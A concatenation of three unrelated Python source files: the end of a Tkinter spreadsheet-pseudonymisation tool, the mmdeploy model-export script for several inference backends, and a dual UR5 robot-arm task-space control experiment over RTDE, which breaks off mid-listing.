df.to_excel(new_name, index=False)
del df
gc.collect()
self._resultOutput.set(str(self._fileName.get()) + " has been pseudonymised")
self.resultLabel.config(style="foreGreen.Label")
self.btn_pseudo['state'] = 'disabled'
self.btn_file['state'] = 'normal'
self.btn_salt['state'] = 'normal'
self.config(cursor="")
self.logger.info('Completing Pseudo: ' + self._fileName.get())
self.kill_progress()
self.hide_pickers()
except BaseException as error:
exc_type, exc_value, exc_traceback = sys.exc_info()
self.resultLabel.config(style="foreRed.Label")
self._resultOutput.set('An exception occurred: details in log file')
self.btn_pseudo['state'] = 'normal'
self.btn_file['state'] = 'normal'
self.btn_salt['state'] = 'normal'
self.logger.error('An exception occurred: {}'.format(error))
self.logger.error('exception line: ' + str(exc_traceback.tb_lineno) + ' error: ' + str(exc_value))
self.kill_progress()
self.hide_pickers()
if __name__ == "__main__":
app = App()
app.mainloop()
|
deploy.py | # Copyright (c) OpenMMLab. All rights reserved.
import argparse
import logging
import os.path as osp
from functools import partial
import mmcv
import torch.multiprocessing as mp
from torch.multiprocessing import Process, set_start_method
from mmdeploy.apis import (create_calib_table, extract_model,
get_predefined_partition_cfg, torch2onnx,
torch2torchscript, visualize_model)
from mmdeploy.utils import (IR, Backend, get_backend, get_calib_filename,
get_ir_config, get_model_inputs,
get_partition_config, get_root_logger, load_config,
target_wrapper)
from mmdeploy.utils.export_info import dump_info
def parse_args():
parser = argparse.ArgumentParser(description='Export model to backends.')
parser.add_argument('deploy_cfg', help='deploy config path')
parser.add_argument('model_cfg', help='model config path')
parser.add_argument('checkpoint', help='model checkpoint path')
parser.add_argument('img', help='image used to convert model model')
parser.add_argument(
'--test-img', default=None, help='image used to test model')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--calib-dataset-cfg',
help='dataset config path used to calibrate in int8 mode. If not \
specified,it will use "val" dataset in model config instead.',
default=None)
parser.add_argument(
'--device', help='device used for conversion', default='cpu')
parser.add_argument(
'--log-level',
help='set log level',
default='INFO',
choices=list(logging._nameToLevel.keys()))
parser.add_argument(
'--show', action='store_true', help='Show detection outputs')
parser.add_argument(
'--dump-info', action='store_true', help='Output information for SDK')
args = parser.parse_args()
return args
def create_process(name, target, args, kwargs, ret_value=None):
logger = get_root_logger()
logger.info(f'{name} start.')
log_level = logger.level
wrap_func = partial(target_wrapper, target, log_level, ret_value)
process = Process(target=wrap_func, args=args, kwargs=kwargs)
process.start()
process.join()
if ret_value is not None:
if ret_value.value != 0:
logger.error(f'{name} failed.')
exit(1)
else:
logger.info(f'{name} success.')
def torch2ir(ir_type: IR):
"""Return the conversion function from torch to the intermediate
representation.
Args:
ir_type (IR): The type of the intermediate representation.
"""
if ir_type == IR.ONNX:
return torch2onnx
elif ir_type == IR.TORCHSCRIPT:
return torch2torchscript
else:
raise KeyError(f'Unexpected IR type {ir_type}')
def main():
args = parse_args()
set_start_method('spawn')
logger = get_root_logger()
logger.setLevel(args.log_level)
deploy_cfg_path = args.deploy_cfg
model_cfg_path = args.model_cfg
checkpoint_path = args.checkpoint
# load deploy_cfg
deploy_cfg, model_cfg = load_config(deploy_cfg_path, model_cfg_path)
# create work_dir if not
mmcv.mkdir_or_exist(osp.abspath(args.work_dir))
if args.dump_info:
dump_info(deploy_cfg, model_cfg, args.work_dir, pth=checkpoint_path)
ret_value = mp.Value('d', 0, lock=False)
# convert to IR
ir_config = get_ir_config(deploy_cfg)
ir_save_file = ir_config['save_file']
ir_type = IR.get(ir_config['type'])
create_process(
f'torch2{ir_type.value}',
target=torch2ir(ir_type),
args=(args.img, args.work_dir, ir_save_file, deploy_cfg_path,
model_cfg_path, checkpoint_path),
kwargs=dict(device=args.device),
ret_value=ret_value)
# convert backend
ir_files = [osp.join(args.work_dir, ir_save_file)]
# partition model
partition_cfgs = get_partition_config(deploy_cfg)
if partition_cfgs is not None:
if 'partition_cfg' in partition_cfgs:
partition_cfgs = partition_cfgs.get('partition_cfg', None)
else:
assert 'type' in partition_cfgs
partition_cfgs = get_predefined_partition_cfg(
deploy_cfg, partition_cfgs['type'])
origin_ir_file = ir_files[0]
ir_files = []
for partition_cfg in partition_cfgs:
save_file = partition_cfg['save_file']
save_path = osp.join(args.work_dir, save_file)
start = partition_cfg['start']
end = partition_cfg['end']
dynamic_axes = partition_cfg.get('dynamic_axes', None)
create_process(
f'partition model {save_file} with start: {start}, end: {end}',
extract_model,
args=(origin_ir_file, start, end),
kwargs=dict(dynamic_axes=dynamic_axes, save_file=save_path),
ret_value=ret_value)
ir_files.append(save_path)
# calib data
calib_filename = get_calib_filename(deploy_cfg)
if calib_filename is not None:
calib_path = osp.join(args.work_dir, calib_filename)
create_process(
'calibration',
create_calib_table,
args=(calib_path, deploy_cfg_path, model_cfg_path,
checkpoint_path),
kwargs=dict(
dataset_cfg=args.calib_dataset_cfg,
dataset_type='val',
device=args.device),
ret_value=ret_value)
backend_files = ir_files
# convert backend
backend = get_backend(deploy_cfg)
if backend == Backend.TENSORRT:
model_params = get_model_inputs(deploy_cfg)
assert len(model_params) == len(ir_files)
from mmdeploy.apis.tensorrt import is_available as trt_is_available
from mmdeploy.apis.tensorrt import onnx2tensorrt
assert trt_is_available(
), 'TensorRT is not available,' \
+ ' please install TensorRT and build TensorRT custom ops first.'
backend_files = []
for model_id, model_param, onnx_path in zip(
range(len(ir_files)), model_params, ir_files):
onnx_name = osp.splitext(osp.split(onnx_path)[1])[0]
save_file = model_param.get('save_file', onnx_name + '.engine')
partition_type = 'end2end' if partition_cfgs is None \
else onnx_name
create_process(
f'onnx2tensorrt of {onnx_path}',
target=onnx2tensorrt,
args=(args.work_dir, save_file, model_id, deploy_cfg_path,
onnx_path),
kwargs=dict(device=args.device, partition_type=partition_type),
ret_value=ret_value)
backend_files.append(osp.join(args.work_dir, save_file))
elif backend == Backend.NCNN:
from mmdeploy.apis.ncnn import is_available as is_available_ncnn
if not is_available_ncnn():
logger.error('ncnn support is not available.')
exit(1)
from mmdeploy.apis.ncnn import get_output_model_file, onnx2ncnn
backend_files = []
for onnx_path in ir_files:
model_param_path, model_bin_path = get_output_model_file(
onnx_path, args.work_dir)
create_process(
f'onnx2ncnn with {onnx_path}',
target=onnx2ncnn,
args=(onnx_path, model_param_path, model_bin_path),
kwargs=dict(),
ret_value=ret_value)
backend_files += [model_param_path, model_bin_path]
elif backend == Backend.OPENVINO:
from mmdeploy.apis.openvino import \
is_available as is_available_openvino
assert is_available_openvino(), \
'OpenVINO is not available, please install OpenVINO first.'
from mmdeploy.apis.openvino import (get_input_info_from_cfg,
get_mo_options_from_cfg,
get_output_model_file,
onnx2openvino)
openvino_files = []
for onnx_path in ir_files:
model_xml_path = get_output_model_file(onnx_path, args.work_dir)
input_info = get_input_info_from_cfg(deploy_cfg)
output_names = get_ir_config(deploy_cfg).output_names
mo_options = get_mo_options_from_cfg(deploy_cfg)
create_process(
f'onnx2openvino with {onnx_path}',
target=onnx2openvino,
args=(input_info, output_names, onnx_path, args.work_dir,
mo_options),
kwargs=dict(),
ret_value=ret_value)
openvino_files.append(model_xml_path)
backend_files = openvino_files
elif backend == Backend.PPLNN:
from mmdeploy.apis.pplnn import is_available as is_available_pplnn
assert is_available_pplnn(), \
'PPLNN is not available, please install PPLNN first.'
from mmdeploy.apis.pplnn import onnx2pplnn
pplnn_files = []
for onnx_path in ir_files:
algo_file = onnx_path.replace('.onnx', '.json')
model_inputs = get_model_inputs(deploy_cfg)
assert 'opt_shape' in model_inputs, 'Expect opt_shape ' \
'in deploy config for PPLNN'
# PPLNN accepts only 1 input shape for optimization,
# may get changed in the future
input_shapes = [model_inputs.opt_shape]
create_process(
f'onnx2pplnn with {onnx_path}',
target=onnx2pplnn,
args=(algo_file, onnx_path),
kwargs=dict(device=args.device, input_shapes=input_shapes),
ret_value=ret_value)
pplnn_files += [onnx_path, algo_file]
backend_files = pplnn_files
if args.test_img is None:
args.test_img = args.img
headless = False
# check headless or not for all platforms.
import tkinter
try:
tkinter.Tk()
except Exception:
headless = True
# for headless installation.
if not headless:
# visualize model of the backend
create_process(
f'visualize {backend.value} model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, backend_files,
args.test_img, args.device),
kwargs=dict(
backend=backend,
output_file=osp.join(args.work_dir,
f'output_{backend.value}.jpg'),
show_result=args.show),
ret_value=ret_value)
# visualize pytorch model
create_process(
'visualize pytorch model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, [checkpoint_path],
args.test_img, args.device),
kwargs=dict(
backend=Backend.PYTORCH,
output_file=osp.join(args.work_dir, 'output_pytorch.jpg'),
show_result=args.show),
ret_value=ret_value)
else:
logger.warning(
'\"visualize_model\" has been skipped may be because it\'s \
running on a headless device.')
logger.info('All process success.')
if __name__ == '__main__':
main()
|
DualTaskSpaceControl.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Dual Task Space Control
import numpy as np
import argparse
from numpy.linalg import norm
from numpy.linalg import inv
from scipy.io import savemat
import matplotlib.pyplot as plot
import struct
import UR5Class
import socket
import time
import sys
import csv
#import json
import Transformations as tf
import os
import threading
import trajectoryGenerator
import StepGenerator
from numpy.linalg import inv
import rtde.rtde as rtde
import rtde.rtde_config as rtde_config
HOST1 = "192.168.0.99" # The remote host
HOST2 = "192.168.0.98"
PORT = 30003 # The same port as used by the server
def getData(comm):
#s.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
data = comm.recv(1060)
return data
# getData abre uma conexao com o robo e recebe o pacote de dados de 1060 Bytes
def sendString(comm, string, move_time = 8, pose = False):
string = "[" + str(string[0]) + "," + str(string[1]) + "," + str(string[2]) + "," + str(string[3]) + "," + str(string[4]) + "," + str(string[5]) + "]"
if (pose == True):
p = "p"
else:
p = ""
str_data = "movej(" + p + string + ", t = " + str(move_time) + ")" + "\n"
comm.send(str_data.encode('ascii'))
return
def speedJ(comm, string, a = 4*np.pi):
string = "[" + str(string[0]) + "," + str(string[1]) + "," + str(string[2]) + "," + str(string[3]) + "," + str(string[4]) + "," + str(string[5]) + "]"
str_data = "speedj(" + string + ", a = " + str(a) + ",t=0.1)" + "\n"
#s.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
comm.send(str_data.encode('ascii'))
return
def connect(HOST,PORT):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
return s
def main(args):
print ("Starting Program")
delta_standard_DH = np.mat([[7.80880090239748336e-05, 0.361257734372265993, 0.00128388035686166635, 1.67232993846963135e-05, 2.02354943719599362e-05, 0], \
[-0.000718642187888640649, 0.00106284384336133905, -0.022893992683020014, -0.00115732902891929612, 0.000201414435319735574, 0], \
[7.02198637382578372e-05, -395.302340315824551, 396.777096992026259, -1.47374645443299634,0.000169498815833071803, 0.000364725429982712401], \
[2.91984009971350678e-05, -1.42023254669109278, 1.33410045447338699, 0.0861037286066216462, -3.46593927803766182e-05, -2.71063161709674666e-05]])
delta_standard_DH_2 = np.mat([[ -5.39038176483263552e-06, 0.200686268169445209, 0.00228952454238523506, 2.04485825460639469e-05, -1.56897709565794351e-05, 0],\
[ 0.00039024637623907843, 0.000904178045744563359, 0.0145652098260125283, -0.000690055586142879207, 0.000644539557413503772, 0],\
[ 0.000178790506571227525, 399.392832822527851, -396.49020940525736, -2.90172143203552535, 0.000311791168683808739, 0.000378711630321493242], \
[ 7.05887359599974621e-05, 1.01499272342048541, -0.906943504886603802, -6.39125177018525026, 2.3011110588447593e-05, 5.9590107063629152e-05]])
# Dados de calibracao do robo
ur5_1 = UR5Class.UR5Class(delta_standard_DH)
ur5_2 = UR5Class.UR5Class(delta_standard_DH_2)
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((HOST1, PORT))
s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((HOST2, PORT))
s2.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
# process = threading.Thread(target=speedJ,args=[HOST,PORT])
# process.start()
time.sleep(0.3)
ur5_1.setRobotData(getData(s1))
ur5_2.setRobotData(getData(s2))
s1.close()
s2.close()
initialPose1 = ur5_1.getPosition()
initialPose2 = ur5_2.getPosition()
#initialPose[3:6] = tf.rotationVector2RollPitchYaw(initialPose[3:6])
print("InitialPose UR5-1: ", initialPose1)
print("InitialPose UR5-1 calculated: ", ur5_1.ur5_direct_kinematics(ur5_1.getJointPosition(), vector = True, apply_offset = True))
initialPose1[3:6] = tf.rotationVector2RollPitchYaw(initialPose1[3:6])
initialPose1RPY = initialPose1.copy()
print("Initial Pose UR5-1 RPY", initialPose1RPY)
print("Initial Pose UR5-1 RPY calculated", ur5_1.ur5_direct_kinematics(ur5_1.getJointPosition(), vector = True, apply_offset = True,rpy=True))
print("InitialPose UR5-2: ", initialPose2)
print("InitialPose UR5-2 calculated: ", ur5_2.ur5_direct_kinematics(ur5_2.getJointPosition(), vector = True, apply_offset = True))
initialPose2[3:6] = tf.rotationVector2RollPitchYaw(initialPose2[3:6])
initialPose2RPY = initialPose2.copy()
print("Initial Pose UR5-2 RPY", initialPose2RPY)
print("Initial Pose UR5-2 RPY calculated", ur5_2.ur5_direct_kinematics(ur5_2.getJointPosition(), vector = True, apply_offset = True,rpy=True))
freq = 0.008
trajectoryUR51 = trajectoryGenerator.trajectoryGenerator(initialPose1, step = freq, speed = 0.05, direction = "left")
trajectoryUR51.generateTrajectory()
trajectoryUR51.saveDatabase()
trajectoryUR52 = trajectoryGenerator.trajectoryGenerator(initialPose2, step = freq, speed = 0.05, direction = "right")
trajectoryUR52.generateTrajectory()
trajectoryUR52.saveDatabase()
trajectorySpeedList_1 = []
trajectorySpeed_1 = []
trajectorySpeedList_2 = []
trajectorySpeed_2 = []
for i in range(0,np.shape(trajectoryUR51.database)[0]-1):
if (i == 0):
trajectorySpeedList_1.append(np.array([0,0,0,0,0,0]))
else:
trajectorySpeedList_1.append((trajectoryUR51.database[i,:] - trajectoryUR51.database[i-1,:])/0.008)
for i in range(0,np.shape(trajectoryUR52.database)[0]-1):
if (i == 0):
trajectorySpeedList_2.append(np.array([0,0,0,0,0,0]))
else:
trajectorySpeedList_2.append((trajectoryUR52.database[i,:] - trajectoryUR52.database[i-1,:])/0.008)
trajectorySpeed_1 = np.asarray(trajectorySpeedList_1, dtype = np.float64)
trajectorySpeed_2 = np.asarray(trajectorySpeedList_2, dtype = np.float64)
print('Trajectory 1 number of steps is: ' + str(trajectoryUR51.maxStepNumber -1))
print('Trajectory 2 number of steps is: ' + str(trajectoryUR52.maxStepNumber -1))
countMax = trajectoryUR51.maxStepNumber -1
input('Aperte Enter pro play')
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((HOST1, PORT))
s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((HOST2, PORT))
s2.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
count = 0
countAux = 0
timeList = []
timeListPerStep = []
#Pose
poseListUR5_1 = []
poseSpeedListUR5_1 = []
#Junta
jointList_1 = []
speedList_1 = []
speedCalculatedListUR5_1 = []
#Força
TCPForceList_UR5_1 = []
#Pose
poseListUR5_2 = []
poseSpeedListUR5_2 = []
#Junta
jointList_2 = []
speedList_2 = []
speedCalculatedListUR5_2 = []
#Força
TCPForceList_UR5_2 = []
lostTime = 0
t1 = time.perf_counter()
timeInit = t1
timeListRobot_1 = []
timeListRobot_2 = []
ur5_1.setRobotData(getData(s1))
timeInitRobot_1 = ur5_1.getTime()
ur5_2.setRobotData(getData(s2))
timeInitRobot_2 = ur5_2.getTime()
s1.close()
s2.close()
jointControl_1 = np.zeros(6)
jointControl_2 = np.zeros(6)
auxiliar = False
# s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s1.connect((HOST1, PORT))
# s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
# s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s2.connect((HOST1, PORT))
# s2.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
#parameters
parser = argparse.ArgumentParser()
parser.add_argument('--host', default='192.168.0.99', help='name of host to connect to (localhost)')
parser.add_argument('--port', type=int, default=30004, help='port number (30004)')
parser.add_argument('--samples', type=int, default=0, help='number of samples to record')
parser.add_argument('--frequency', type=int, default=125, help='the sampling frequency in Herz')
parser.add_argument('--config', default='record_configuration.xml', help='data configuration file to use (record_configuration.xml)')
parser.add_argument('--output', default='robot_data.csv', help='data output file to write to (robot_data.csv)')
parser.add_argument("--verbose", help="increase output verbosity", action="store_true")
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
conf = rtde_config.ConfigFile(args.config)
output_names, output_types = conf.get_recipe('out')
setp_names, setp_types = conf.get_recipe('setp')
watchdog_names, watchdog_types = conf.get_recipe('watchdog')
con1 = rtde.RTDE(args.host, args.port)
con2 = rtde.RTDE('192.168.0.98', 30004)
con1.connect()
con2.connect()
# get controller version
con1.get_controller_version()
con2.get_controller_version()
con1.send_output_setup(output_names, output_types)
setp1 = con1.send_input_setup(setp_names, setp_types)
watchdog1 = con1.send_input_setup(watchdog_names, watchdog_types)
con2.send_output_setup(output_names, output_types)
setp2 = con2.send_input_setup(setp_names, setp_types)
watchdog2 = con2.send_input_setup(watchdog_names, watchdog_types)
print(setp_names)
# setup recipes
# if not con.send_output_setup(output_names, output_types, frequency = args.frequency):
# logging.error('Unable to configure output')
# sys.exit()
#start data synchronization
# if not con.send_start():
# logging.error('Unable to start synchronization')
# sys.exit()
# fig = plot.figure(1)
# ax = fig.gca(projection='3d')
# ax.plot(trajectoryUR51.database[:,0],trajectoryUR51.database[:,1],trajectoryUR51.database[:,2])
# fig = plot.figure(2)
# ax = fig.gca(projection='3d')
# ax.plot(trajectoryUR52.database[:,0],trajectoryUR52.database[:,1],trajectoryUR52.database[:,2])
# plot.show()
# exit()
setp1.input_double_register_0 = 0
setp1.input_double_register_1 = 0
setp1.input_double_register_2 = 0
setp1.input_double_register_3 = 0
setp1.input_double_register_4 = 0
setp1.input_double_register_5 = 0
setp1.input_double_register_6 = 0
watchdog1.input_int_register_0 = 0
setp2.input_double_register_0 = 0
setp2.input_double_register_1 = 0
setp2.input_double_register_2 = 0
setp2.input_double_register_3 = 0
setp2.input_double_register_4 = 0
setp2.input_double_register_5 = 0
setp2.input_double_register_6 = 0
watchdog2.input_int_register_0 = 0
# con2.disconnect()
# con2.connect()
# con2.get_controller_version()
# con2.send_output_setup(output_names, output_types)
# setp2 = con2.send_input_setup(setp_names, setp_types)
# setp2.input_double_register_0 = 0
# setp2.input_double_register_1 = 0
# setp2.input_double_register_2 = 0
# setp2.input_double_register_3 = 0
# setp2.input_double_register_4 = 0
# setp2.input_double_register_5 = 0
# setp2.input_double_register_6 = 0
print(ur5_1.getPosition())
print(ur5_1.getJointPosition())
print(trajectoryUR51.database[0,:])
print(trajectorySpeed_1[0,:])
if not con1.send_output_setup(output_names, output_types, frequency = args.frequency):
logging.error('Unable to configure output')
sys.exit()
#start data synchronization
if not con1.send_start():
logging.error('Unable to start synchronization')
sys.exit()
if not con2.send_output_setup(output_names, output_types, frequency = args.frequency):
logging.error('Unable to configure output')
sys.exit()
#start data synchronization
if not con2.send_start():
logging.error('Unable to start synchronization')
sys.exit()
timeInit = time.perf_counter()
con1.send(setp1)
con2.send(setp2)
input('RTDE configurado, pressione enter')
# s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s1.connect((HOST1, PORT))
# s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
auxiliar = True
while(count < countMax):
# dataUR51 = getData(s1)
# dataUR52 = getData(s2)
t1 = time.perf_counter()
state1 = con1.receive()
state2 = con2.receive()
ur5_1.setRobotDataRTDE(state1)
ur5_2.setRobotDataRTDE(state2)
# ur5_1.setRobotData(dataUR51)
# ur5_2.setRobotData(dataUR52)
#tcp_pose = np.asarray(state.target_TCP_pose)
# print(tcp_pose)
# print("\n")
#print(ur5_1.getPosition())
#Choose your Control
#jointControl = ur5.controlLoopInverse(trajectory.database[count,:])
#jointControl = ur5.controlLoopPseudoInverse(trajectory.database[count,:])
jointControl_1 = ur5_1.controlLoopDLS(trajectoryUR51.database[count,:], cartesianSpeedReference = trajectorySpeed_1[count,:])
jointControl_2 = ur5_2.controlLoopDLS(trajectoryUR52.database[count,:], cartesianSpeedReference = trajectorySpeed_2[count,:])
# jointControl = ur5.controlLoopDLS(target)
#jointControl = ur5.speedTransform(desiredSpeed)
#jointControl = np.array([0, 0, 0, 0, 0, 0.1])
if (auxiliar == True):
# timeListRobot_1.append(state.timestamp)
# speedList_1.append(state.target_qd)
# poseListUR5_1.append(state.target_TCP_pose)
# speedCalculatedListUR5_1.append(jointControl_1)
#poseListUR5_2.append(poseUR5_2)
timeListRobot_1.append(ur5_1.getTime()-timeInitRobot_1)
timeListRobot_2.append(ur5_2.getTime()-timeInitRobot_2)
jointList_1.append(ur5_1.getJointPosition())
jointList_2.append(ur5_2.getJointPosition())
speedList_1.append(ur5_1.getJointSpeedTarget())
speedList_2.append(ur5_2.getJointSpeedTarget())
#jointPositionList.append(ur5.getJointPositionTarget())
poseUR5_1 = ur5_1.getPosition()
poseUR5_2 = ur5_2.getPosition()
poseUR5_1[3:6] = tf.rotationVector2RollPitchYaw(poseUR5_1[3:6])
poseUR5_2[3:6] = tf.rotationVector2RollPitchYaw(poseUR5_2[3:6])
poseListUR5_1.append(poseUR5_1)
poseListUR5_2.append(poseUR5_2)
poseSpeedListUR5_1.append(ur5_1.getTCPSpeedTarget())
poseSpeedListUR5_2.append(ur5_2.getTCPSpeedTarget())
speedCalculatedListUR5_1.append(jointControl_1)
speedCalculatedListUR5_2.append(jointControl_2)
TCPForceList_UR5_1.append(ur5_1.getTCPForce())
TCPForceList_UR5_2.append(ur5_2.getTCPForce())
else:
if (norm(ur5_1.getJointSpeedTarget()) > 0):
auxiliar = True
count = count + 1
setp1.__dict__["input_double_register_0"] = jointControl_1[0]
setp1.__dict__["input_double_register_1"] = jointControl_1[1]
setp1.__dict__["input_double_register_2"] = jointControl_1[2]
setp1.__dict__["input_double_register_3"] = jointControl_1[3]
setp1.__dict__["input_double_register_4"] = jointControl_1[4]
setp1.__dict__["input_double_register_5"] = jointControl_1[5]
setp1.__dict__["input_double_register_6"] = 1
con1.send(setp1)
con1.send(watchdog1)
setp2.__dict__["input_double_register_0"] = jointControl_2[0]
setp2.__dict__["input_double_register_1"] = jointControl_2[1]
setp2.__dict__["input_double_register_2"] = jointControl_2[2]
setp2.__dict__["input_double_register_3"] = jointControl_2[3]
setp2.__dict__["input_double_register_4"] = jointControl_2[4]
setp2.__dict__["input_double_register_5"] = jointControl_2[5]
setp2.__dict__["input_double_register_6"] = 1
con2.send(setp2)
con2.send(watchdog2)
#speedJ(s1, jointControl_1)
#speedJ(s2, jointControl_2)
t2 = time.perf_counter()
timeListPerStep.append(t2 - t1)
timeList.append(t2-timeInit)
#print(t2 - t1)
setp1.__dict__["input_double_register_0"] = 0
setp1.__dict__["input_double_register_1"] = 0
setp1.__dict__["input_double_register_2"] = 0
setp1.__dict__["input_double_register_3"] = 0
setp1.__dict__["input_double_register_4"] = 0
setp1.__dict__["input_double_register_5"] = 0
setp1.__dict__["input_double_register_6"] = 0
con1.send(setp1)
con1.send(watchdog1)
setp2.__dict__["input_double_register_0"] = 0
setp2.__dict__["input_double_register_1"] = 0
setp2.__dict__["input_double_register_2"] = 0
setp2.__dict__["input_double_register_3"] = 0
setp2.__dict__["input_double_register_4"] = 0
setp2.__dict__["input_double_register_5"] = 0
setp2.__dict__["input_double_register_6"] = 0
con2.send(setp2)
con2.send(watchdog2)
print("FOI: " + str(count))
# print(timeListRobot_1)
# print("\n\n\n\n\n\n")
# print(speedList_1)
# print("\n\n\n\n\n\n")
# print(poseListUR5_1)
# exit()
# s1.close()
# s2.close()
errorArray_1 = np.asarray(ur5_1.errorDB, dtype=np.float32)
errorArray_2 = np.asarray(ur5_2.errorDB, dtype=np.float32)
#np.save("/home/nascimento/Projects/MESTRADO - Task Space Control/generatedPaths/UR5/Error", errorArray)
timeArray_1 = np.asarray(timeListRobot_1, dtype=np.float32)
timeArray_2 = np.asarray(timeListRobot_2, dtype=np.float32)
normErrorPosition_1 = []
normErrorRotation_1 = []
normErrorPosition_2 = []
normErrorRotation_2 = []
speedListArray_1 = np.asarray(speedList_1, dtype=np.float32)
speedListArray_2 = np.asarray(speedList_2, dtype=np.float32)
speedCalculatedListArrayUR5_1 = np.asarray(speedCalculatedListUR5_1, dtype=np.float32)
speedCalculatedListArrayUR5_2 = np.asarray(speedCalculatedListUR5_2, dtype=np.float32)
poseListArrayUR5_1 = np.asarray(poseListUR5_1, dtype = np.float32)
poseListArrayUR5_2 = np.asarray(poseListUR5_2, dtype = np.float32)
TCPForceArrayUR5_1 = np.asarray(TCPForceList_UR5_1, dtype = np.float32)
TCPForceArrayUR5_2 = np.asarray(TCPForceList_UR5_2, dtype = np.float32)
poseSpeedArrayUR5_1 = np.asarray(poseSpeedListUR5_1, dtype = np.float32)
poseSpeedArrayUR5_2 = np.asarray(poseSpeedListUR5_2, dtype = np.float32)
jointArray_1 = np.asarray(jointList_1, dtype = np.float32)
jointArray_2 = np.asarray(jointList_2, dtype = np.float32)
#jointPositionListArray = np.asarray(jointPositionList, dtype=np.float32)
for i in range(np.shape(errorArray_1)[0] - np.shape(timeArray_1)[0],np.shape(errorArray_1)[0]):
normErrorPosition_1.append(norm(errorArray_1[i,0:3]))
normErrorRotation_1.append(norm(errorArray_1[i,3:6]))
for i in range(np.shape(errorArray_2)[0] - np.shape(timeArray_2)[0],np.shape(errorArray_2)[0]):
normErrorPosition_2.append(norm(errorArray_2[i,0:3]))
normErrorRotation_2.append(norm(errorArray_2[i,3:6]))
# for i in range(0,np.shape(speedListArray)[0]):
# print (speedListArray[i,:])
normErrorPositionArray_1 = np.asarray(normErrorPosition_1, dtype = np.float32)
normErrorRotationArray_1 = np.asarray(normErrorRotation_1, dtype = np.float32)
normErrorPositionArray_2 = np.asarray(normErrorPosition_2, dtype = np.float32)
normErrorRotationArray_2 = np.asarray(normErrorRotation_2, dtype = np.float32)
wDBarray_1 = np.asarray(ur5_1.wDB, dtype = np.float32)
wDBarray_2 = np.asarray(ur5_2.wDB, dtype = np.float32)
print("Lost steps are: " + str(lostTime))
mdict = {'normErrorPosition_UR5_1': normErrorPosition_1, 'normErrorPosition_UR5_2': normErrorPosition_2,
'normErrorRotation_UR5_1':normErrorRotation_1,'normErrorRotation_UR5_2':normErrorRotation_2, 'expTime_1':timeArray_1,'expTime_2':timeArray_2,'speedListJointArray_UR5_1':speedListArray_1,
'speedListJointArray_UR5_2':speedListArray_2, 'speedCalculatedListJointArray_UR5_1':speedCalculatedListArrayUR5_1,'speedCalculatedListJointArray_UR5_2':speedCalculatedListArrayUR5_2,
'wDBarray_UR5_1':wDBarray_1, 'wDBarray_UR5_2':wDBarray_2, 'PoseArray_UR5_1':poseListArrayUR5_1, 'PoseArray_UR5_2':poseListArrayUR5_2, 'TCPForceArray_1':TCPForceArrayUR5_1, 'TCPForceArray_2':TCPForceArrayUR5_2,
'poseSpeedArray_1':poseSpeedArrayUR5_1, 'poseSpeedArray_2':poseSpeedArrayUR5_2, 'jointArray_1':jointArray_1, 'jointArray_2':jointArray_2,'TrajectoryUR51Database':trajectoryUR51.database,'TrajectoryUR52Database':trajectoryUR52.database}
savemat('DualBox_10',mdict)
# for i in range(0,len(timeListPerStep)):
# print(timeListPerStep[i])
plot.figure(1)
plot.plot(timeArray_1,normErrorPositionArray_1)
plot.xlabel("Tempo(s)")
plot.ylabel("Erro(m)")
plot.suptitle("UR5 1 - Erro absoluto - Posicao")
plot.figure(2)
plot.plot(timeArray_2,normErrorPositionArray_2)
plot.xlabel("Tempo(s)")
plot.ylabel("Erro(m)")
plot.suptitle("UR5 2 - Erro absoluto - Posicao")
# plot.figure(2)
# plot.plot(timeArray,speedListArray[:,0], color = "red", label="Velocidade Real")
# plot.plot(timeArray,speedCalculatedListArray[:,0], color = "blue", label="Velocidade Calculada")
# plot.xlabel("Tempo(s)")
# plot.ylabel("Velocidade(rad/s)")
# plot.suptitle("Velocidade - Junta 1")
# plot.legend(loc='upper left')
# plot.figure(3)
# plot.plot(timeArray,speedListArray[:,1], color = "red", label="Velocidade Real")
# plot.plot(timeArray,speedCalculatedListArray[:,1], color = "blue", label="Velocidade Calculada")
# plot.xlabel("Tempo(s)")
# plot.ylabel("Velocidade(rad/s)")
# plot.suptitle("Velocidade - Junta 2")
# plot.legend(loc='upper left')
# plot.figure(4)
# plot.plot(timeArray,speedListArray[:,2], color = "red", label="Velocidade Real")
# plot.plot(timeArray,speedCalculatedListArray[:,2], color = "blue", label="Velocidade Calculada")
# plot.xlabel("Tempo(s)")
# plot.ylabel("Velocidade(rad/s)")
# plot.suptitle("Velocidade - Junta 3")
# plot.legend(loc='upper left')
# plot.figure(5)
# plot.plot(timeArray,speedListArray[:,3], color = "red", label="Velocidade Real")
# plot.plot(timeArray,speedCalculatedListArray[:,3], color = "blue", label="Velocidade Calculada")
# plot.xlabel("Tempo(s)")
# plot.ylabel("Velocidade(rad/s)")
# plot.suptitle("Velocidade - Junta 4")
# plot.legend(loc='upper left')
# plot.figure(6)
# plot.plot(timeArray,speedListArray[:,4], color = "red", label="Velocidade Real")
